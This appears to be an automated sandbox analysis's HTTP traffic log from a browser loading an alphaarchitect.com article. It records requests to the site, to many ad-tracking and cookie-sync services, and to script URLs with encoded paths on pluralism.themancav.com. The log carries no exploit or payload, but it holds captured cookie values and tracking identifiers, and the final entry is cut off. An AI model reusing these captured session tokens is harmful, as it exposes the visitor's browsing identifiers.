Source: global trafficHTTP traffic detected: GET /1/i/adsct?bci=4&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=3&event=%7B%7D&event_id=35a62779-3103-4d26-971c-4f08e5001cdc&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=3ee9298e-0466-4bf9-b2dd-c2597a405bbd&tw_document_href=https%3A%2F%2Falphaarchitect.com%2F2024%2F12%2Flong-term-expected-returns%2F&tw_iframe_status=0&txn_id=oavgv&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-column.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/apps/hcaptcha.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /1/i/adsct?bci=4&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=3&event=%7B%7D&event_id=35a62779-3103-4d26-971c-4f08e5001cdc&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=3ee9298e-0466-4bf9-b2dd-c2597a405bbd&tw_document_href=https%3A%2F%2Falphaarchitect.com%2F2024%2F12%2Flong-term-expected-returns%2F&tw_iframe_status=0&txn_id=oavgv&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/hcaptcha-gravity-forms.min.js?ver=4.8.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /px/?c=2645100a8c95db0&rid=35b401bb-dd38-4632-8412-1dce28eac56b HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-DJ0HWC0D2K&gacid=1149377197.1734698707&gtm=45je4cc1v888867815za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=710385115 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/enterprise/core.js?ver=1734350104 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ== HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/i/adsct?bci=4&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=3&event=%7B%7D&event_id=35a62779-3103-4d26-971c-4f08e5001cdc&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=3ee9298e-0466-4bf9-b2dd-c2597a405bbd&tw_document_href=https%3A%2F%2Falphaarchitect.com%2F2024%2F12%2Flong-term-expected-returns%2F&tw_iframe_status=0&txn_id=oavgv&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: muc_ads=9c070232-dd6d-4c3e-8cd5-a4e7b90ae4a1; __cf_bm=.E2bFojrmlPq.BvUzfmnH83MHrdxE1RMRhGBCQ70YNo-1734698709-1.0.1.1-HpFXTiXUG.YK3QMPP88Nn.q7_Ba3tcCKeCKPkJO.mjdxiv2ZFgXVC8wgEdMV5TG8JH3ITyICw5Ca5lCBk7.BHg
Source: global trafficHTTP traffic detected: GET /px/?c=2645100a8c95db0&rid=35b401bb-dd38-4632-8412-1dce28eac56b HTTP/1.1Host: a.clickcertain.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935; _ccpx_2645100a8c95db0=1; _ccpx=2645100a8c95db0
Source: global trafficHTTP traffic detected: GET /1/i/adsct?bci=4&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=3&event=%7B%7D&event_id=35a62779-3103-4d26-971c-4f08e5001cdc&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=3ee9298e-0466-4bf9-b2dd-c2597a405bbd&tw_document_href=https%3A%2F%2Falphaarchitect.com%2F2024%2F12%2Flong-term-expected-returns%2F&tw_iframe_status=0&txn_id=oavgv&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest_id_marketing=v1%3A173469870943376077; guest_id_ads=v1%3A173469870943376077; personalization_id="v1_rZ+tSkUlEP2HHvvWFWthKg=="; guest_id=v1%3A173469870943376077
Source: global trafficHTTP traffic detected: GET /px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=US&rid=35b401bb-dd38-4632-8412-1dce28eac56b HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935; _ccpx_2645100a8c95db0=1; _ccpx=2645100a8c95db0
Source: global trafficHTTP traffic detected: GET /2024/12/long-term-expected-returns/ HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg; _ga_DJ0HWC0D2K=GS1.1.1734698706.1.0.1734698706.60.0.0; _ga=GA1.1.1149377197.1734698707
Source: global trafficHTTP traffic detected: GET /1/api.js?onload=hCaptchaOnLoad&render=explicit&recaptchacompat=off HTTP/1.1Host: js.hcaptcha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px/r/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935 HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=US&rid=35b401bb-dd38-4632-8412-1dce28eac56bAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935; _ccpx=2645100a8c95db0; _ccpx_2645100a8c95db0=2
Source: global trafficHTTP traffic detected: GET /px/ta/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935 HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=US&rid=35b401bb-dd38-4632-8412-1dce28eac56bAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935; _ccpx=2645100a8c95db0; _ccpx_2645100a8c95db0=2
Source: global trafficHTTP traffic detected: GET /2024/12/long-term-expected-returns/ HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg; _ga_DJ0HWC0D2K=GS1.1.1734698706.1.0.1734698706.60.0.0; _ga=GA1.1.1149377197.1734698707If-Modified-Since: Mon, 16 Dec 2024 12:16:08 GMT
Source: global trafficHTTP traffic detected: GET /ldc.js?pid=193f0456&aid=193f0456 HTTP/1.1Host: tag.trovo-tag.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cookie-sync/fivebyfive HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cs?puid=4fb965c5-16ea-5d92-8eb3-ebb71d1ea0d9&pid=lc&r=https%3a%2f%2fa%2eclickcertain%2ecom%2fpx%2ft%2f%3fdone%3dtrue%26rid%3d35b401bb%2ddd38%2d4632%2d8412%2d1dce28eac56b%26uid%3d%24%7bDEVICE_ID%7d%26hem%3d%24%7bHEM_SHA256_LOWERCASE%7d HTTP/1.1Host: a.usbrowserspeed.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ== HTTP/1.1Host: pluralism.themancav.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/api.js?onload=hCaptchaOnLoad&render=explicit&recaptchacompat=off HTTP/1.1Host: js.hcaptcha.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/v1/b4956db/static/hcaptcha.html HTTP/1.1Host: newassets.hcaptcha.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=3318&partner_device_id=355cc50d-f67c-485f-9153-f0a0ddff6935&partner_url=https%3a%2f%2fa%2eclickcertain%2ecom%2fpx%2fta%2f%3fdone%3dtrue%26ta_id%3d%24%7bTA_DEVICE_ID%7d HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2024/12/long-term-expected-returns/ HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg; _ga_DJ0HWC0D2K=GS1.1.1734698706.1.0.1734698706.60.0.0; _ga=GA1.1.1149377197.1734698707If-Modified-Since: Mon, 16 Dec 2024 12:16:08 GMT
Source: global trafficHTTP traffic detected: GET /s/56408?bidder_id=200441&bidder_uuid=355cc50d-f67c-485f-9153-f0a0ddff6935&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&redir=https%253a%252f%252fcm%252eg%252edoubleclick%252enet%252fpixel%253fgoogle_nid%253dclickcertain%2526google_cm%253d1%2526google_sc%253d1%2526redir%253dhttps%25253a%25252f%25252fsecure%25252eadnxs%25252ecom%25252fgetuidu%25253fhttps%25253a%25252f%25252fa%25252eclickcertain%25252ecom%25252fpx%25252fimg%25252fbidswitch%25252f%25253fdone%25253dtrue%252526ccid%25253d355cc50d%25252df67c%25252d485f%25252d9153%25252df0a0ddff6935%252526anx_uId%25253d%252524UID HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cookie-sync/fivebyfive?_bee_ppp=1 HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: checkForPermission=ok
Source: global trafficHTTP traffic detected: GET /NGNU7k9BN4dQQW7cAld4zEcXMZ4WWXaPWgI4l04GC4hEQXjMRkFuzF8MMpZNCi2CXggwgFEFLZpSBj+bFh4= HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px/t/?done=true&rid=35b401bb-dd38-4632-8412-1dce28eac56b&uid=f27c034d-52d6-414d-9827-1e513fce5322&hem= HTTP/1.1Host: a.clickcertain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ccpx_u=355cc50d%2df67c%2d485f%2d9153%2df0a0ddff6935; _ccpx=2645100a8c95db0; _ccpx_2645100a8c95db0=2
Source: global trafficHTTP traffic detected: GET /ldc.js?pid=193f0456&aid=193f0456 HTTP/1.1Host: tag.trovo-tag.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive/check?partner_id=3318&partner_device_id=355cc50d-f67c-485f-9153-f0a0ddff6935&partner_url=https%3a%2f%2fa%2eclickcertain%2ecom%2fpx%2fta%2f%3fdone%3dtrue%26ta_id%3d%24%7bTA_DEVICE_ID%7d HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a.clickcertain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1734698716199; TapAd_DID=3ebc0ed4-fc0f-44fd-9c47-0f20e0dde668
Source: global trafficHTTP traffic detected: GET /s/56408?redir=https%253a%252f%252fcm%252eg%252edoubleclick%252enet%252fpixel%253fgoogle_nid%253dclickcertain%2526google_cm%253d1%2526google_sc%253d1%2526redir%253dhttps%25253a%25252f%25252fsecure%25252eadnxs%25252ecom%25252fgetuidu%25253fhttps%25253a%25252f%25252fa%25252eclickcertain%25252ecom%25252fpx%25252fimg%25252fbidswitch%25252f%25253fdone%25253dtrue%252526ccid%25253d355cc50d%25252df67c%25252d485f%25252d9153%25252df0a0ddff6935%252526anx_uId%25253d%252524UID&bidder_id=200441&bidder_uuid=355cc50d-f67c-485f-9153-f0a0ddff6935&_li_chk=true&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&previous_uuid=4b4a4cc191da422caf6995355dc4fc30 HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", 